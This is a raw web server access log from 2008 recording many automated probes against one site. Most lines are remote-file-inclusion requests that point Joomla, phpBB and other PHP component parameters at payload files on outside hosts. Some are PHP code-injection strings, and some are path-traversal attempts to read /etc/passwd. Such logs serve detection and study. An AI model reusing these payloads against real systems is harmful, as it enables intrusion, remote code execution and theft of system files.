206.221.184.148 - - [23/Apr/2008:12:25:57 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.221.184.148 - - [23/Apr/2008:12:25:59 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.808" "www.dmulk.com"
206.221.184.148 - - [23/Apr/2008:12:25:59 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.167.156.20 - - [23/Apr/2008:12:26:05 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [23/Apr/2008:12:26:09 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [23/Apr/2008:12:26:16 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "dmulk.com"
203.72.181.15 - - [23/Apr/2008:12:26:16 -0700] "GET //main.php?sayfa=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "dmulk.com"
203.72.181.15 - - [23/Apr/2008:12:26:16 -0700] "GET /logs//main.php?sayfa=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "dmulk.com"
89.108.67.176 - - [23/Apr/2008:12:26:45 -0700] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://www.ppxp.ru/images/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.9.83.84 - - [23/Apr/2008:12:26:57 -0700] "GET /logs/access.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.9.83.84 - - [23/Apr/2008:12:26:57 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.246.61.4 - - [23/Apr/2008:12:27:07 -0700] "GET /logs/access.log/include/status.inc.php?tm_includepath=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [23/Apr/2008:12:27:07 -0700] "GET /logs/access.log/include/status.inc.php?tm_includepath=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.19.182.143 - - [23/Apr/2008:12:27:38 -0700] "GET /logs/access_080324.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.19.182.143 - - [23/Apr/2008:12:27:38 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.19.182.143 - - [23/Apr/2008:12:27:39 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.19.182.143 - - [23/Apr/2008:12:27:42 -0700] "GET /logs/access_080123.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.42.133.2 - - [23/Apr/2008:12:28:23 -0700] "GET /logs/access_080126.log/include/Classes.inc.php?tm_includepath=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [23/Apr/2008:12:28:26 -0700] "GET /logs/access_080204.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.ramoviferramentas.com.br/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [23/Apr/2008:12:28:27 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.ramoviferramentas.com.br/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [23/Apr/2008:12:28:48 -0700] "GET /config.php?path_to_root=http://www.ramoviferramentas.com.br/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.205.178.120 - - [23/Apr/2008:12:28:54 -0700] "GET /logs/access_080321.log//modules/My_eGallery/public/displayCategory.php?basepath=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.84.128.164 - - [23/Apr/2008:12:29:16 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.casadaserra.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.128.164 - - [23/Apr/2008:12:29:17 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.casadaserra.kit.net/id.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.128.164 - - [23/Apr/2008:12:29:17 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.casadaserra.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.215.80.102 - - [23/Apr/2008:12:30:11 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.ramoviferramentas.com.br/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.213.30 - - [23/Apr/2008:12:30:31 -0700] "GET /minamijewelry/html/schedule.html HTTP/1.0" 200 12758 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
217.168.112.1 - - [23/Apr/2008:12:31:04 -0700] "GET /?mosConfig_absolute_path=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:31:11 -0700] "GET /logs/access_080312.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:31:16 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.128.164 - - [23/Apr/2008:12:31:26 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.casadaserra.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.128.164 - - [23/Apr/2008:12:31:29 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.casadaserra.kit.net/id.txt??? HTTP/1.1" 200 4139 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:31:30 -0700] "GET /logs/access_080312.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:31:32 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:31:36 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:12:31:38 -0700] "GET /logs/access_080218.log/view.php?sub=http://216.120.252.101/~beogor/news/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:31:38 -0700] "GET /logs/access_080312.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:31:43 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:12:31:48 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.182.143 - - [23/Apr/2008:12:31:49 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:31:49 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:12:31:50 -0700] "GET //index.php?option=com_custompages&cpage=http://redrumfans.com/id?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:12:31:50 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:31:51 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:12:31:59 -0700] "GET /logs/access.log/errors.php?error=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:12:32:00 -0700] "GET /errors.php?error=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:12:32:00 -0700] "GET /logs/errors.php?error=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
216.167.156.20 - - [23/Apr/2008:12:32:29 -0700] "GET /logs/access_080324.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [23/Apr/2008:12:32:29 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:32:36 -0700] "GET /logs/access_080312.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:32:41 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:32:47 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.168.112.1 - - [23/Apr/2008:12:33:08 -0700] "GET /logs/access_080227.log/?path%5Bdocroot%5D=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.59.22.11 - - [23/Apr/2008:12:33:21 -0700] "GET /administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=http://www.iskraznanja.com/images/stories/response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.21.194 - - [23/Apr/2008:12:33:24 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.bpec-english.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
74.54.21.194 - - [23/Apr/2008:12:33:24 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.bpec-english.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
213.219.217.74 - - [23/Apr/2008:12:33:33 -0700] "GET /logs/access_080321.log//modules/My_eGallery/public/displayCategory.php?basepath=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:33:43 -0700] "GET /logs/access_080312.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:33:48 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:33:54 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.9.83.84 - - [23/Apr/2008:12:34:01 -0700] "GET /logs/access_080215.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:12:34:08 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:12:34:12 -0700] "GET /logs/access_080226.log//config.inc.php?path_escape=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.202.45.222 - - [23/Apr/2008:12:34:27 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://mabooshi.com/system/cache/pictures/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
147.202.45.222 - - [23/Apr/2008:12:34:28 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://mabooshi.com/system/cache/pictures/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
217.168.112.1 - - [23/Apr/2008:12:34:57 -0700] "GET /?mosConfig_absolute_path=http://www.spacecolonization.net/2080/var_cache/ed4n.php?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
147.202.45.222 - - [23/Apr/2008:12:35:03 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://mabooshi.com/system/cache/pictures/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
200.93.147.155 - - [23/Apr/2008:12:35:04 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://www.sustainaqua.org//rspn.jpg?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
200.93.147.155 - - [23/Apr/2008:12:35:04 -0700] "GET /index2.php?mosConfig_absolute_path=http://www.sustainaqua.org//rspn.jpg?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
147.202.45.222 - - [23/Apr/2008:12:35:04 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://mabooshi.com/system/cache/pictures/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:12:35:54 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:12:35:56 -0700] "GET //index.php?option=com_custompages&cpage=http://redrumfans.com/id?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
72.20.5.22 - - [23/Apr/2008:12:35:57 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://redrumfans.com/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.59.22.11 - - [23/Apr/2008:12:36:18 -0700] "GET /logs/access_080224.log/administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=http://www.iskraznanja.com/images/stories/response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.59.22.11 - - [23/Apr/2008:12:36:18 -0700] "GET /logs/administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=http://www.iskraznanja.com/images/stories/response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.138.12.147 - - [23/Apr/2008:12:36:19 -0700] "GET /logs/access_080204.log//Joomla_path/components/com_joomlaboard/file_upload.php?sbp=http://www.trepamontes4x4.com/digi/menu?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.138.12.147 - - [23/Apr/2008:12:36:20 -0700] "GET /logs//Joomla_path/components/com_joomlaboard/file_upload.php?sbp=http://www.trepamontes4x4.com/digi/menu?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.216.107 - - [23/Apr/2008:12:36:22 -0700] "GET /logs/access_080215.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.207.204.13 - - [23/Apr/2008:12:36:24 -0700] "GET /logs/access_080329.log//citywriter/head.php?path=http://www.redfroggy.com/adposts/posts/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [23/Apr/2008:12:36:24 -0700] "GET //citywriter/head.php?path=http://www.redfroggy.com/adposts/posts/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [23/Apr/2008:12:36:24 -0700] "GET /logs//citywriter/head.php?path=http://www.redfroggy.com/adposts/posts/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:12:37:10 -0700] "GET /logs/access_080226.log//config.inc.php?path_escape=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.54.9.218 - - [23/Apr/2008:12:37:13 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "dmulk.com"
195.54.9.218 - - [23/Apr/2008:12:37:14 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:37:21 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:37:26 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:37:26 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:37:30 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:37:43 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:12:38:01 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://216.120.252.101/~beogor/news/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
58.138.12.147 - - [23/Apr/2008:12:38:13 -0700] "GET /logs/access_080106.log//Joomla_path/components/com_joomlaboard/file_upload.php?sbp=http://www.trepamontes4x4.com/digi/menu?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:12:38:54 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://216.120.252.101/~beogor/news/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:12:39:02 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET%5Ba%5D),exit.%2527&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:12:39:19 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://216.120.252.101/~beogor/news/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:39:32 -0700] "GET /logs/access_080309.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.30.73.117 - - [23/Apr/2008:12:39:38 -0700] "GET /logs/access_080321.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:39:41 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
69.59.22.11 - - [23/Apr/2008:12:39:41 -0700] "GET //ppa/inc/functions.inc.php?config[ppa_root_path]=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
69.59.22.11 - - [23/Apr/2008:12:39:41 -0700] "GET /logs//ppa/inc/functions.inc.php?config[ppa_root_path]=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:12:39:45 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST%5Boption%5D=option,com_comprofiler&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:39:46 -0700] "GET /logs/access_080309.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:39:47 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:39:49 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:39:49 -0700] "GET /logs/access_080309.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:39:49 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
